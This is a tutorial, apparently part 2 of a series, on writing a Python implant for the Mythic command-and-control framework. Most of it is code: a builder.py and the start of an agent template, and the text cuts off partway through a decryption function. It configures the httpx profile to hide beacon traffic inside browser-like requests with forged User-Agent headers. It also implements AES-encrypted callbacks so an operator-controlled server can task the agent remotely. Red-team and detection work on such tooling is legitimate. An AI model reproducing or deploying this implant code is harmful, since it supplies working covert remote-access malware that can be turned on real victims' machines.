Building a Mythic C2 Agent in Python — Part 2: Batched Tasking, HTTPS, and the httpx Profile
Overview
Part 1 left us with a working but operationally naive agent. Three things need fixing before we can consider it even minimally production-ready:
- One task per beacon. The agent sends tasking_size: 1 and sleeps between every single task, even if Mythic has ten tasks queued. The Mythic docs explicitly describe a way to request all pending tasks and fold responses into the next tasking request to halve round trips.
- Plaintext traffic. HTTP with no encryption is only acceptable for debugging. We need TLS and Mythic-managed AES-256 PSK encryption.
- No request shaping. The http profile is fixed: the message always goes in the body of a POST. The httpx profile lets you put the agent message anywhere in the request and customise every header, so the traffic blends into legitimate-looking web activity.
This part addresses all three. We'll also properly explain what a C2 profile actually is before introducing the new one.
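To make the first item concrete, here is a minimal sketch of a batched tasking request. It assumes, from our reading of the Mythic agent message docs, that tasking_size: -1 asks for every queued task and that a responses array may ride along in the same get_tasking message. build_get_tasking and the sample response are hypothetical names for illustration, not part of the Part 1 agent.

```python
def build_get_tasking(pending_responses, tasking_size=-1):
    """Build one get_tasking message that also carries queued task output.

    Assumption: tasking_size=-1 means "send me everything that is queued".
    """
    msg = {"action": "get_tasking", "tasking_size": tasking_size}
    if pending_responses:
        # Copy the list so the caller can clear its queue after a successful send
        msg["responses"] = list(pending_responses)
    return msg


# Hypothetical output from a task that finished since the last beacon
queued = [{"task_id": "hypothetical-task-uuid", "user_output": "done", "completed": True}]
message = build_get_tasking(queued)
```

With nothing queued, the responses key is simply omitted, so the same helper covers both the idle beacon and the combined request.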
1. What is a C2 Profile?
Before switching profiles it is worth understanding what they actually are. Per the Mythic C2 development docs:
C2 profiles live in their own docker containers and act as a translation mechanism between whatever your special sauce C2 protocol is and what the back-end Mythic server understands (HTTP + JSON). Their entire role in life is to get data off the wire from whatever special communications format you're using and forward that to Mythic.
And from the C2 profiles operational docs:
There are two main pieces for every C2 profile: Server code — code that runs in a docker container to convert the C2 profile communication specification into the corresponding RESTful endpoints that Mythic uses. Agent code — the code that runs in a callback to implement the C2 profile on the target machine.
A C2 profile is a separate Docker container. Your agent talks to the C2 profile container; the profile container talks to Mythic. The agent never communicates with Mythic directly:
Agent ──HTTP/S──▶ C2 Profile Container ──HTTP + JSON──▶ Mythic Backend
      ◀──────────                      ◀───────────────
http vs httpx
http is "simple HTTP async comms using standard GET/POST requests." The message is always in the POST body. There is no configuration of where the message lives or how it is transformed.
httpx is "a more dynamic and configurable HTTP profile." Per the README it supports:
- Message location in cookies, headers, query parameters, or body
- Message transforms: base64, base64url, XOR, NetBIOS, prepend, append
- Custom client/server headers
- Multiple callback domains with rotation
The configuration is provided via a JSON file uploaded at build time. This file is a contract between two parties:
- The httpx server container reads it to know how to parse incoming requests and format outgoing responses
- The agent must independently implement the same contract — applying the same transforms, using the same URI, placing the message in the specified location
The agent does not read the file at runtime. The relevant values (URI, message location, transforms) are extracted from the file by builder.py at build time and stamped into the agent as constants.
2. The Malleable Profile Config File
The profile config schema is shown in Xenon's example profiles. The top-level structure is:
{
  "name": "Profile Name",
  "get": {
    "verb": "GET",
    "uris": ["/uri1", "/uri2"],
    "client": {
      "headers": { "User-Agent": "..." },
      "parameters": null,
      "message": {
        "location": "query",
        "name": "filter"
      },
      "transforms": [
        { "action": "base64url", "value": "" }
      ]
    },
    "server": {
      "headers": { "Content-Type": "application/json" },
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    }
  },
  "post": {
    "verb": "POST",
    "uris": ["/upload"],
    "client": {
      "headers": { "Content-Type": "application/json" },
      "parameters": null,
      "message": {
        "location": "body",
        "name": ""
      },
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    },
    "server": {
      "headers": {},
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    }
  }
}
Key fields:
- name: required. The httpx container uses this to identify the profile variation. Omitting it produces Missing name for agent variation.
- message.location: where the agent places the message: "body", "query", "header", or "cookie".
- message.name: the query parameter, header, or cookie name when location is not "body".
- client.transforms: transforms applied to the message before sending, in order.
- server.transforms: transforms the agent applies in reverse to decode the server's response.
- uris: array of URI paths. The agent selects from these per request.
Available transform actions per the httpx README: base64, base64url, xor, prepend, append, netbios, netbiosu.
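The "in order" and "in reverse" wording is easiest to see on a small chain. The sketch below is illustrative only: it covers three of the listed actions, and the function names encode and decode plus the sample chain are our own, not taken from the httpx code.

```python
import base64


def encode(data: bytes, transforms: list) -> bytes:
    """Apply each transform in the order the profile lists them."""
    for t in transforms:
        action, value = t["action"], t.get("value", "")
        if action == "base64url":
            data = base64.urlsafe_b64encode(data)
        elif action == "prepend":
            data = value.encode() + data
        elif action == "append":
            data = data + value.encode()
        else:
            raise ValueError(f"not covered by this sketch: {action}")
    return data


def decode(data: bytes, transforms: list) -> bytes:
    """Undo the same list, walking it backwards."""
    for t in reversed(transforms):
        action, value = t["action"], t.get("value", "")
        if action == "base64url":
            data = base64.urlsafe_b64decode(data)
        elif action == "prepend":
            data = data[len(value.encode()):]
        elif action == "append":
            # Slice by explicit end index so an empty value removes nothing
            data = data[:len(data) - len(value.encode())]
        else:
            raise ValueError(f"not covered by this sketch: {action}")
    return data


# Hypothetical chain: encode, then wrap so the value looks like a cookie pair
chain = [
    {"action": "base64url", "value": ""},
    {"action": "prepend", "value": "session="},
    {"action": "append", "value": ";"},
]
wire = encode(b"hello", chain)
```

Decoding has to strip the append first and the base64url last; walking the list forwards instead would try to base64-decode the wrapper text.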
The Profile for Part 2
Save this as pyrite_httpx.json before generating a payload. This uses the simplest possible transform (body + base64) to keep the agent straightforward while still correctly implementing the full pipeline:
{
  "name": "Pyrite",
  "get": {
    "verb": "GET",
    "uris": ["/"],
    "client": {
      "headers": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
      },
      "parameters": null,
      "message": {
        "location": "body",
        "name": ""
      },
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    },
    "server": {
      "headers": {},
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    }
  },
  "post": {
    "verb": "POST",
    "uris": ["/data"],
    "client": {
      "headers": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Content-Type": "application/octet-stream"
      },
      "parameters": null,
      "message": {
        "location": "body",
        "name": ""
      },
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    },
    "server": {
      "headers": {},
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    }
  }
}
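Because a bad profile only surfaces as a build or runtime error, it can help to sanity-check the file before uploading it. The checker below is a rough sketch that tests only the fields described above; validate_profile is a hypothetical helper, and the real httpx container may enforce more (or different) rules.

```python
import json

VALID_LOCATIONS = {"body", "query", "header", "cookie"}
KNOWN_ACTIONS = {"base64", "base64url", "xor", "prepend", "append", "netbios", "netbiosu"}


def validate_profile(cfg: dict) -> list:
    """Return a list of human-readable problems; an empty list means it looks sane."""
    problems = []
    if not cfg.get("name"):
        problems.append("missing name")
    for verb in ("get", "post"):
        block = cfg.get(verb) or {}
        if not block.get("uris"):
            problems.append(f"{verb}: no uris")
        msg = (block.get("client") or {}).get("message") or {}
        loc = msg.get("location")
        if loc not in VALID_LOCATIONS:
            problems.append(f"{verb}: bad message.location {loc!r}")
        elif loc != "body" and not msg.get("name"):
            problems.append(f"{verb}: message.name is required for {loc}")
        for side in ("client", "server"):
            for t in (block.get(side) or {}).get("transforms") or []:
                if t.get("action") not in KNOWN_ACTIONS:
                    problems.append(f"{verb}.{side}: unknown transform {t.get('action')!r}")
    return problems


# A cut-down profile in the same shape as pyrite_httpx.json
half = {
    "verb": "POST",
    "uris": ["/data"],
    "client": {"message": {"location": "body", "name": ""},
               "transforms": [{"action": "base64", "value": ""}]},
    "server": {"transforms": [{"action": "base64", "value": ""}]},
}
good = json.loads(json.dumps({"name": "Pyrite", "get": half, "post": half}))
issues = validate_profile(good)
```

To check the real file, load it with json.load(open("pyrite_httpx.json")) and print whatever the function returns.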
3. Install httpx and pycryptodome
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/httpx
Also update pyrite/Dockerfile to install pycryptodome — the agent uses it for AES-256-CBC encryption:
FROM itsafeaturemythic/mythic_python_base:latest
WORKDIR /Mythic/
RUN pip install requests pycryptodome
CMD ["python3", "main.py"]
pycryptodome must also be available on the target machine where the agent runs. If the target is a controlled lab host, install it with pip install pycryptodome. For targets where you cannot guarantee it is available, use AESPSK = none (plaintext mode). A production agent would bundle the AES implementation — Part 3 addresses this when we implement a custom protocol.
4. builder.py — Full Updated Version
File: pyrite/mythic/agent_functions/builder.py
This file runs inside the payload type's container on the Mythic server, not on the target. It must contain only the Pyrite(PayloadType) class. It must not contain any REPLACE_* tokens; those belong exclusively in pyrite/agent_code/pyrite_agent.py. If builder.py contains a bare REPLACE_* token, Python raises a NameError when the container imports the module: the token is a syntactically valid identifier, but no variable with that name is defined.
The mythic/agent_functions/ layout follows the Medusa convention established in Part 1. All server-side container code lives under pyrite/mythic/; implant code lives under pyrite/agent_code/.
# pyrite/mythic/agent_functions/builder.py
import logging
import pathlib
import json
from mythic_container.PayloadBuilder import *
from mythic_container.MythicCommandBase import *
from mythic_container.MythicRPC import *


class Pyrite(PayloadType):
    name = "pyrite"
    file_extension = "py"
    author = "@yourhandle"
    supported_os = [SupportedOS.Linux, SupportedOS.Windows, SupportedOS.MacOS]
    wrapper = False
    wrapped_payloads = []
    note = "Simple Python3 agent for demonstrating Mythic agent development."
    supports_dynamic_loading = True
    mythic_encrypts = True
    translation_container = None
    c2_profiles = ["httpx"]  # Part 2: httpx only
    build_parameters = [
        BuildParameter(
            name="version",
            parameter_type=BuildParameterType.String,
            description="Agent version string",
            default_value="0.1.0",
            required=False,
        ),
    ]
    agent_path = pathlib.Path(".") / "pyrite"
    agent_icon_path = agent_path / "mythic" / "agent_functions" / "pyrite.svg"
    agent_code_path = agent_path / "agent_code"
    build_steps = [
        BuildStep(
            step_name="Gathering Files",
            step_description="Reading agent template and command files from disk",
        ),
        BuildStep(
            step_name="Configuring",
            step_description="Stamping C2 parameters into the agent source",
        ),
    ]
    async def build(self) -> BuildResponse:
        resp = BuildResponse(status=BuildStatus.Success)
        # ── Step 1: Read template and command files ────────────────────────
        try:
            # Context managers close the file handles promptly
            with open(self.agent_code_path / "pyrite_agent.py", "r") as f:
                agent_source = f.read()
            command_code = ""
            for cmd in self.commands.get_commands():
                try:
                    with open(self.agent_code_path / f"{cmd}.py", "r") as f:
                        command_code += f.read() + "\n"
                except FileNotFoundError:
                    # Command has no agent-side source file; skip it
                    pass
            agent_source = agent_source.replace(
                "# ##COMMAND_CODE_INSERT##",
                command_code
            )
            await SendMythicRPCPayloadUpdatebuildStep(
                MythicRPCPayloadUpdateBuildStepMessage(
                    PayloadUUID=self.uuid,
                    StepName="Gathering Files",
                    StepStdout="Read agent template and command files successfully",
                    StepSuccess=True,
                )
            )
        except Exception as e:
            await SendMythicRPCPayloadUpdatebuildStep(
                MythicRPCPayloadUpdateBuildStepMessage(
                    PayloadUUID=self.uuid,
                    StepName="Gathering Files",
                    StepStdout=str(e),
                    StepSuccess=False,
                )
            )
            resp.set_status(BuildStatus.Error)
            resp.build_stderr = f"Failed to read agent template: {e}"
            return resp
        # ── Step 2: Extract parameters and stamp into agent ────────────────
        try:
            if len(self.c2info) != 1:
                raise ValueError(f"Expected 1 C2 profile, got {len(self.c2info)}")
            params = self.c2info[0].get_parameters_dict()
            # ── AESPSK ─────────────────────────────────────────────────────
            # AESPSK is a C2 profile parameter with crypto_type=True.
            # When operator selects "aes256_hmac", Mythic auto-generates a
            # 32-byte per-payload AES key and returns it as a dict.
            # When "none" is selected, no key is generated.
            # Per the Mythic checkin docs, Mythic looks up this key by
            # PayloadUUID to know how to decrypt incoming agent messages.
            aespsk_raw = params.get("AESPSK")
            if isinstance(aespsk_raw, dict):
                aespsk = aespsk_raw.get("enc_key") or ""
            elif aespsk_raw:
                aespsk = str(aespsk_raw)
            else:
                aespsk = ""
            # ── encrypted_exchange_check ────────────────────────────────────
            # Boolean C2 profile parameter defined by httpx. Controls whether
            # the agent performs RSA EKE (staging_rsa exchange) before checkin.
            #   True  + AESPSK set → EKE: use AESPSK only for staging exchange,
            #                        then use negotiated session key for all traffic
            #   False + AESPSK set → Static PSK: use AESPSK for all traffic directly
            #   False + no AESPSK  → Plaintext: no encryption
            eke_raw = params.get("encrypted_exchange_check", False)
            if isinstance(eke_raw, str):
                eke_enabled = eke_raw.lower() in ("true", "t", "1", "yes")
            else:
                eke_enabled = bool(eke_raw)
            use_eke = eke_enabled and bool(aespsk)
            # ── Callback domains ───────────────────────────────────────────
            # httpx uses callback_domains (array of full URLs).
            # Mythic may return it as a Python list or as a JSON array string.
            callback_domains = params.get("callback_domains", ["http://127.0.0.1:80"])
            if isinstance(callback_domains, str):
                # Try to parse as JSON array e.g. '["http://127.0.0.1:82"]'
                try:
                    callback_domains = json.loads(callback_domains)
                except Exception:
                    callback_domains = [callback_domains]
            if isinstance(callback_domains, list) and callback_domains:
                first_domain = str(callback_domains[0]).strip()
            else:
                first_domain = str(callback_domains).strip()
            # Parse scheme://host:port
            # e.g. "http://127.0.0.1:82" → host="http://127.0.0.1", port="82"
            import re
            domain_match = re.match(r'^(https?://[^:/]+):(\d+)/?$', first_domain)
            if domain_match:
                callback_host = domain_match.group(1)
                callback_port = domain_match.group(2)
            else:
                # No explicit port: use the scheme default
                callback_host = first_domain.rstrip("/")
                callback_port = "443" if first_domain.startswith("https") else "80"
            # ── Parse the uploaded malleable profile config file ────────────
            # The correct parameter key is "raw_c2_config".
            # It contains the JSON/TOML profile config file contents as a string.
            profile_config = {}
            raw_config = params.get("raw_c2_config")
            if raw_config:
                if isinstance(raw_config, str) and len(raw_config) == 36:
                    # It's a file UUID, so fetch the contents via MythicRPC
                    file_resp = await SendMythicRPCFileGetContent(
                        MythicRPCFileGetContentMessage(AgentFileId=raw_config)
                    )
                    if file_resp.Success:
                        profile_config = json.loads(file_resp.Content)
                elif isinstance(raw_config, str):
                    profile_config = json.loads(raw_config)
                elif isinstance(raw_config, dict):
                    profile_config = raw_config
            # ── Extract values from the profile config ──────────────────────
            # POST block: used for checkin and post_response
            post_block = profile_config.get("post", {})
            post_client = post_block.get("client", {})
            post_msg = post_client.get("message", {})
            post_server = post_block.get("server", {})
            post_uris = post_block.get("uris", ["/data"])
            post_uris_json = json.dumps(post_uris)
            post_uri = post_uris[0] if post_uris else "/data"  # kept for fallback
            post_msg_loc = post_msg.get("location", "body")
            post_msg_name = post_msg.get("name", "")
            post_transforms = json.dumps(post_client.get("transforms", []))
            post_srv_xforms = json.dumps(post_server.get("transforms", []))
            post_headers = json.dumps(post_client.get("headers", {}))
            # GET block: used for get_tasking
            get_block = profile_config.get("get", {})
            get_client = get_block.get("client", {})
            get_msg = get_client.get("message", {})
            get_server = get_block.get("server", {})
            get_uris = get_block.get("uris", ["/"])
            get_uris_json = json.dumps(get_uris)
            get_uri = get_uris[0] if get_uris else "/"  # kept for fallback
            get_msg_loc = get_msg.get("location", "body")
            get_msg_name = get_msg.get("name", "")
            get_transforms = json.dumps(get_client.get("transforms", []))
            get_srv_xforms = json.dumps(get_server.get("transforms", []))
            get_headers = json.dumps(get_client.get("headers", {}))
            # ── Build replacements dict ─────────────────────────────────────
            # Every value must be a str: params.get() and the profile JSON can
            # yield None (e.g. "name": null) and str.replace() raises on None.
            def s(val, default=""):
                return str(val) if val is not None else default
            replacements = {
                "REPLACE_CALLBACK_HOST": callback_host,
                "REPLACE_CALLBACK_PORT": callback_port,
                "REPLACE_CALLBACK_INTERVAL": s(params.get("callback_interval"), "10"),
                "REPLACE_CALLBACK_JITTER": s(params.get("callback_jitter"), "23"),
                "REPLACE_PAYLOAD_UUID": str(self.uuid),
                "REPLACE_AESPSK": aespsk,
                "REPLACE_KILL_DATE": s(params.get("killdate"), ""),
                "REPLACE_USE_EKE": str(use_eke),
                # POST profile values
                "REPLACE_POST_URIS": post_uris_json,  # list literal
                "REPLACE_POST_URI": s(post_uri),
                "REPLACE_POST_MSG_LOC": s(post_msg_loc, "body"),
                "REPLACE_POST_MSG_NAME": s(post_msg_name),
                "REPLACE_POST_TRANSFORMS": post_transforms,
                "REPLACE_POST_SERVER_TRANSFORMS": post_srv_xforms,
                "REPLACE_POST_HEADERS": post_headers,
                # GET profile values
                "REPLACE_GET_URIS": get_uris_json,  # list literal
                "REPLACE_GET_URI": s(get_uri),
                "REPLACE_GET_MSG_LOC": s(get_msg_loc, "body"),
                "REPLACE_GET_MSG_NAME": s(get_msg_name),
                "REPLACE_GET_TRANSFORMS": get_transforms,
                "REPLACE_GET_SERVER_TRANSFORMS": get_srv_xforms,
                "REPLACE_GET_HEADERS": get_headers,
            }
            for token, value in replacements.items():
                agent_source = agent_source.replace(token, value)
            await SendMythicRPCPayloadUpdatebuildStep(
                MythicRPCPayloadUpdateBuildStepMessage(
                    PayloadUUID=self.uuid,
                    StepName="Configuring",
                    StepStdout="Stamped all C2 parameters into agent source",
                    StepSuccess=True,
                )
            )
            resp.payload = agent_source.encode()
            resp.build_message = "Pyrite built successfully."
        except Exception as e:
            await SendMythicRPCPayloadUpdatebuildStep(
                MythicRPCPayloadUpdateBuildStepMessage(
                    PayloadUUID=self.uuid,
                    StepName="Configuring",
                    StepStdout=str(e),
                    StepSuccess=False,
                )
            )
            resp.set_status(BuildStatus.Error)
            resp.build_stderr = f"Configuration failed: {e}"
        return resp
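The callback-domain regex in Step 2 only matches scheme://host:port, so a URL with a path or an IPv6 literal falls through to the "no explicit port" branch. As an alternative sketch (not what builder.py above does), the standard library's urlsplit can do the same split; split_callback is a hypothetical helper name.

```python
from urllib.parse import urlsplit


def split_callback(url: str) -> tuple:
    """Split a callback URL into ("scheme://host", "port") strings."""
    parts = urlsplit(url.strip())
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError(f"not an http(s) URL: {url!r}")
    # Fall back to the scheme default when no port is given
    port = parts.port or (443 if parts.scheme == "https" else 80)
    host = parts.hostname
    if ":" in host:
        # urlsplit strips the brackets from IPv6 literals; put them back
        host = f"[{host}]"
    return f"{parts.scheme}://{host}", str(port)


examples = [
    split_callback("http://127.0.0.1:82"),
    split_callback("https://example.com/"),
    split_callback("https://[::1]:8443"),
]
```

The return shape matches what the builder stamps into REPLACE_CALLBACK_HOST and REPLACE_CALLBACK_PORT, so it could be dropped in without touching the agent template.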
5. Understanding mythic_encrypts, AESPSK, and encrypted_exchange_check
mythic_encrypts
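mythic_encrypts = True in builder.py is a developer declaration. It tells Mythic to handle encryption and decryption on the server side with its built-in AES-256-CBC + HMAC-SHA256 scheme rather than delegating to a translation container, which means the agent has to implement that same scheme itself. The C2 profile container is a transparent forwarder: the agent encrypts, Mythic's backend decrypts.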
AESPSK — the encryption key parameter
AESPSK is a C2 profile parameter with crypto_type=True. Per the Mythic checkin docs:
When creating payloads, you can generate encryption keys per C2 profile. To do so, the C2 Profile will have a parameter that has an attribute called crypto_type=True. This will then signal to Mythic to either generate a new per-payload AES256_HMAC key... In the http profile for example, this is a ChooseOne option between aes256_hmac or none.
When aes256_hmac is selected, Mythic auto-generates a 32-byte per-payload AES key and returns it in params["AESPSK"] as {"enc_key":"...","dec_key":"...","value":"aes256_hmac"}. The builder stamps this key into the agent as AESPSK. Mythic also stores it server-side and uses the outer UUID to look it up when decrypting inbound messages.
When none is selected, no key is generated and AESPSK is empty.
encrypted_exchange_check — EKE toggle
encrypted_exchange_check is a boolean parameter defined by the C2 profile; both http and httpx include it. It is not a Mythic core concept (the Mythic docs do not mention it by name), but it is a de facto convention across multiple profiles. It controls whether the agent performs RSA EKE before checkin.
The combination matrix:
| AESPSK | encrypted_exchange_check | What the agent does |
|---|---|---|
| none | either | Plaintext checkin: no key exists, so EKE is impossible regardless of this flag |
| aes256_hmac | false | Static PSK: use the stamped-in AESPSK to encrypt all traffic directly, no EKE staging |
| aes256_hmac | true | EKE: use AESPSK only for the staging_rsa exchange to negotiate a per-session key, then use that session key for all subsequent traffic |
The key difference between static PSK and EKE: with static PSK, the embedded key is used for every callback from that payload — anyone who extracts the binary can decrypt all traffic. With EKE, the embedded key only protects the staging exchange; session traffic uses a unique key negotiated at runtime that never touches disk.
The builder computes USE_EKE = encrypted_exchange_check AND AESPSK_is_set and stamps it into the agent as REPLACE_USE_EKE. do_checkin branches on USE_EKE.
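The matrix reduces to a three-way decision. The sketch below restates it as a pure function so the combinations can be checked in isolation; select_mode and its return strings are hypothetical names, and the string parsing mirrors what the builder does with encrypted_exchange_check.

```python
def select_mode(aespsk: str, encrypted_exchange_check) -> str:
    """Map (AESPSK, encrypted_exchange_check) to the agent's crypto mode."""
    if isinstance(encrypted_exchange_check, str):
        # The parameter may arrive as a string rather than a bool
        eke = encrypted_exchange_check.strip().lower() in ("true", "t", "1", "yes")
    else:
        eke = bool(encrypted_exchange_check)
    if not aespsk:
        # No key exists, so the EKE flag is irrelevant
        return "plaintext"
    return "eke" if eke else "static_psk"


modes = [
    select_mode("", True),
    select_mode("a2V5", "false"),
    select_mode("a2V5", True),
]
```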
Wire format
Regardless of which path is taken, the message format follows the Mythic spec. With encryption active:
Base64( UUID(36) + IV(16) + AES-CBC(JSON body) + HMAC-SHA256(IV + ciphertext) )
Without encryption:
Base64( UUID(36) + JSON body )
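Both layouts are fixed-offset, so they can be framed and sliced with the standard library alone. The sketch below builds the plaintext form and splits the encrypted form into its parts; it uses random bytes as a stand-in for real AES ciphertext (no AES is performed here), and the helper names are our own.

```python
import base64
import hashlib
import hmac
import json
import os

UUID_LEN, IV_LEN, MAC_LEN = 36, 16, 32


def frame_plaintext(uuid_str: str, body: dict) -> bytes:
    """Base64( UUID(36) + JSON body )"""
    return base64.b64encode(uuid_str.encode() + json.dumps(body).encode())


def split_encrypted(wire: bytes) -> tuple:
    """Slice Base64( UUID + IV + ciphertext + HMAC ) into its four parts."""
    raw = base64.b64decode(wire)
    uuid_str = raw[:UUID_LEN].decode()
    iv = raw[UUID_LEN:UUID_LEN + IV_LEN]
    ciphertext = raw[UUID_LEN + IV_LEN:-MAC_LEN]
    mac = raw[-MAC_LEN:]
    return uuid_str, iv, ciphertext, mac


def mac_ok(key: bytes, iv: bytes, ciphertext: bytes, mac: bytes) -> bool:
    """The HMAC-SHA256 covers IV + ciphertext and uses the AES key."""
    expected = hmac.new(key, iv + ciphertext, hashlib.sha256).digest()
    return hmac.compare_digest(mac, expected)


# Demo values: a placeholder UUID and random bytes standing in for ciphertext
uuid_str = "00000000-0000-0000-0000-000000000000"
key, iv, fake_ct = os.urandom(32), os.urandom(16), os.urandom(32)
mac = hmac.new(key, iv + fake_ct, hashlib.sha256).digest()
wire = base64.b64encode(uuid_str.encode() + iv + fake_ct + mac)
```

Checking the MAC before attempting decryption is what lets the agent tell a wrong key apart from a corrupted message.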
6. The Full Agent Template — pyrite_agent.py
File: pyrite/agent_code/pyrite_agent.py
This file is the implant template. It is read as a text file by builder.py at build time; it is never imported by Python directly. The REPLACE_* tokens are plain text substitution markers, not Python variables. Do not put this code in mythic/agent_functions/builder.py.
Replace the file entirely. The agent from Part 1 has no AES implementation — it will stamp in the AESPSK key but never use it, sending plaintext regardless of what the operator selects. Delete the old file and replace it with the version below.
Also update the stale comment in builder.py Step 2 — replace the old comment block for AESPSK with:
# ── AESPSK ─────────────────────────────────────────────────────
# The agent uses this key to encrypt every message body.
# "aes256_hmac" → Mythic returns {"enc_key": "...", "dec_key": "...", "value": "aes256_hmac"}
# "none" → stamp empty string, agent sends plaintext
This is the complete rewrite of the agent for httpx. All profile values are stamped in as constants at build time. The agent implements the full transform pipeline and AES-256-CBC + HMAC-SHA256 encryption.
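Note the token format for list and dict values: they are written without quotes in the template because the builder substitutes them with the output of json.dumps(). That output doubles as a valid Python literal here only because the stamped values contain nothing but strings, lists, and dicts; a JSON null, true, or false would be stamped as an undefined Python name.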
# In template — no quotes:
GET_TRANSFORMS = REPLACE_GET_TRANSFORMS
# After builder substitution — valid Python literal:
GET_TRANSFORMS = [{"action": "base64", "value": ""}]
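One caveat with stamping JSON text into Python source: JSON and Python literals only overlap for strings, numbers, lists, and dicts. The sketch below shows the difference and one possible workaround, stamping repr() of the parsed value instead. It is an illustration, not what builder.py in this part does; the "enabled" key and the REPLACE_PROFILE token are made up for the demo.

```python
import ast
import json

# A value containing JSON-only spellings (null, true)
profile_value = json.loads('{"parameters": null, "enabled": true, "uris": ["/data"]}')

as_json = json.dumps(profile_value)   # still spells them null / true
as_python = repr(profile_value)       # spells them None / True

# Stamp the Python spelling into a one-line template and execute it
template = "PROFILE = REPLACE_PROFILE\n"
stamped = template.replace("REPLACE_PROFILE", as_python)
namespace = {}
exec(stamped, namespace)

# The JSON spelling is not a Python literal: null is just an unknown name
try:
    ast.literal_eval(as_json)
    json_is_python_literal = True
except ValueError:
    json_is_python_literal = False
```

For the transforms and headers used in this part the two spellings are identical, so the existing json.dumps() stamping works; the difference only matters if a profile value ever carries null or a boolean.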
#!/usr/bin/env python3
"""
pyrite_agent.py — Pyrite implant for Mythic C2 (Part 2: httpx)
THIS IS A TEMPLATE. All REPLACE_* tokens are substituted at build time
by builder.py. Do not replace them with real values here.
"""
import base64
import datetime
import json
import os
import platform
import random
import socket
import subprocess
import sys
import time
import traceback
try:
    import requests
    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except ImportError:
    import urllib.request
    import urllib.error
    requests = None
# ── Configuration stamped in by builder.py ────────────────────────────────────
CALLBACK_HOST = "REPLACE_CALLBACK_HOST"
CALLBACK_PORT = REPLACE_CALLBACK_PORT
CALLBACK_INTERVAL = REPLACE_CALLBACK_INTERVAL
CALLBACK_JITTER = REPLACE_CALLBACK_JITTER
PAYLOAD_UUID = "REPLACE_PAYLOAD_UUID"
AESPSK = "REPLACE_AESPSK"
KILL_DATE_STR = "REPLACE_KILL_DATE"
USE_EKE = REPLACE_USE_EKE # True if encrypted_exchange_check=true AND AESPSK set
# ── Profile-derived values stamped in by builder.py ───────────────────────────
# These come from the uploaded malleable profile config file.
# List and dict tokens are substituted WITHOUT quotes — they become
# Python literal values directly (e.g. [{"action": "base64", "value": ""}]).
POST_URIS = REPLACE_POST_URIS
POST_URI = "REPLACE_POST_URI"
POST_MSG_LOC = "REPLACE_POST_MSG_LOC"
POST_MSG_NAME = "REPLACE_POST_MSG_NAME"
POST_TRANSFORMS = REPLACE_POST_TRANSFORMS
POST_SERVER_TRANSFORMS = REPLACE_POST_SERVER_TRANSFORMS
POST_HDRS = REPLACE_POST_HEADERS
GET_URIS = REPLACE_GET_URIS
GET_URI = "REPLACE_GET_URI"
GET_MSG_LOC = "REPLACE_GET_MSG_LOC"
GET_MSG_NAME = "REPLACE_GET_MSG_NAME"
GET_TRANSFORMS = REPLACE_GET_TRANSFORMS
GET_SERVER_TRANSFORMS = REPLACE_GET_SERVER_TRANSFORMS
GET_HDRS = REPLACE_GET_HEADERS
# ── Globals ────────────────────────────────────────────────────────────────────
CALLBACK_UUID = None
SESSION_KEY = None # negotiated AES key after EKE staging — replaces AESPSK
BASE_URL = f"{CALLBACK_HOST}:{CALLBACK_PORT}"
_pending_responses = []
# ─────────────────────────────────────────────────────────────────────────────
# AES-256-CBC + HMAC-SHA256 Encryption
# ─────────────────────────────────────────────────────────────────────────────
# Per the Mythic agent message format docs:
# https://docs.mythic-c2.net/customizing/payload-type-development/
# create_tasking/agent-side-coding/initial-checkin
#
# Wire format when AESPSK is set:
# Base64( UUID(36) + IV(16) + AES-CBC(JSON) + HMAC-SHA256(IV + ciphertext) )
#
# AES details (from docs):
# Mode: CBC
# Padding: PKCS7, block size 16
# IV: 16 random bytes, fresh per message
# HMAC: SHA256 over (IV + ciphertext) using the same AES key, appended after ciphertext
#
# Uses pycryptodome if available, falls back to pyca/cryptography.
# Add to Dockerfile: RUN pip install pycryptodome
import hashlib
import hmac as _hmac_mod
try:
    from Crypto.Cipher import AES as _AES
    from Crypto.Util.Padding import pad as _pad, unpad as _unpad
    _CRYPTO_LIB = "pycryptodome"
except ImportError:
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher as _Cipher
        from cryptography.hazmat.primitives.ciphers.algorithms import AES as _AESAlgo
        from cryptography.hazmat.primitives.ciphers.modes import CBC as _CBC
        from cryptography.hazmat.primitives import padding as _padding
        _CRYPTO_LIB = "cryptography"
    except ImportError:
        _CRYPTO_LIB = None
def mythic_encrypt(plaintext_json: bytes, aes_key_b64: str) -> bytes:
    """
    Encrypt a JSON body per the Mythic static-encryption spec.
    Returns: IV(16) + AES-CBC(padded plaintext) + HMAC-SHA256(IV + ciphertext)
    The UUID prefix is NOT included here; it is prepended in send_message.
    """
    key = base64.b64decode(aes_key_b64)
    iv = os.urandom(16)
    if _CRYPTO_LIB == "pycryptodome":
        cipher = _AES.new(key, _AES.MODE_CBC, iv)
        padded = _pad(plaintext_json, 16)
        ciphertext = cipher.encrypt(padded)
    elif _CRYPTO_LIB == "cryptography":
        padder = _padding.PKCS7(128).padder()
        padded = padder.update(plaintext_json) + padder.finalize()
        cipher = _Cipher(_AESAlgo(key), _CBC(iv))
        encryptor = cipher.encryptor()
        ciphertext = encryptor.update(padded) + encryptor.finalize()
    else:
        raise RuntimeError("No AES library available. Install pycryptodome.")
    mac = _hmac_mod.new(key, iv + ciphertext, hashlib.sha256).digest()
    return iv + ciphertext + mac
def mythic_decrypt(data: bytes, aes_key_b64: str) -> bytes:
    """
    Decrypt a Mythic-format encrypted blob.
    data = IV(16) + ciphertext + HMAC-SHA256(32)
    Verifies HMAC before decrypting. Returns plaintext JSON bytes.
    """
    key = base64.b64decode(aes_key_b64)
    iv = data[:16]
    mac = data[-32:]
    ciphertext = data[16:-32]
    expected = _hmac_mod.new(key, iv + ciphertext, hashlib.sha256).digest()
